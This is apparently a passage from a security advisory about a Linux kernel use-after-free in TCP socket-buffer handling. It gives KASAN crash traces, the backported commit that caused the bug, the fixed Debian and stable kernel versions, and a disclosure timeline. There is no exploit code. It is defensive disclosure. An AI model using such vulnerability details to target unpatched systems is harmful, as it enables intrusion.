BUG: KASAN: use-after-free in skb_release_head_state+0x42/0xf0 at addr ffff8801eb449b50 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x61/0xf0 at addr ffff8801eb449b48 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x17/0xe0 at addr ffff8801eb449b00 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x27/0xe0 at addr ffff8801eb449bc8 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x8a/0xf0 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0xa6/0xf0 at addr ffff8801eb449b60 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_all+0x1a/0x30 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x1a/0x140 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x2d/0x140 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x40/0x140 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skbmem+0x15/0x80 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_init_tso_segs+0x1e/0xc0 at addr ffff8801eb449a30 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_write_xmit+0x51b/0x1d50 at addr ffff8801eb449a34 - Read of size 1 by task rep/29723
Recommendation
This bug was introduced by the stable-kernel backports of upstream commit 7f582b248d0a ("tcp: purge write queue in tcp_connect_init()"). Apply the security updates shipped with Debian Security Advisory DSA 4497-1.
The vulnerability has been addressed in Debian 3.16.72-1, 4.9.168-1+deb9u5~deb8u1 and 4.9.168-1+deb9u5.
The fix should be included in the upcoming stable releases:
- 3.16.73
- 4.4.190
- 4.9.190
- 4.14.139
Timeline
21/05/2019 - Initial email to Debian security team
26/05/2019 - Debian security team identified a potential patch
06/08/2019 - Patch file received from Debian, confirming a fix
14/08/2019 - Advisory released